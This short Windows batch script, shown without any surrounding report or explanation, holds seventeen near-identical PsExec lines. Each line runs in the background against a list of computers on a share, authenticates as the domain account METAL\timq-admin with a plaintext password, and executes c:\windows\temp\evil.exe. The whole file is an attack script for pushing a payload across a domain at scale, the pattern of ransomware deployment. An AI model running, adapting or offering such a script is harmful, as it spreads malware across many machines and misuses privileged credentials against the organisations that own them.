start PsExec.exe -d @C:\share$\comps1.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps2.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps3.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps4.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps5.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps6.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps7.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps8.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps9.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps10.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps11.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps12.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps13.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps14.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps15.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps16.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe
start PsExec.exe -d @C:\share$\comps17.txt -u METAL\timq-admin> -p “Fall2021!” cmd /c c:\windows\temp\evil.exe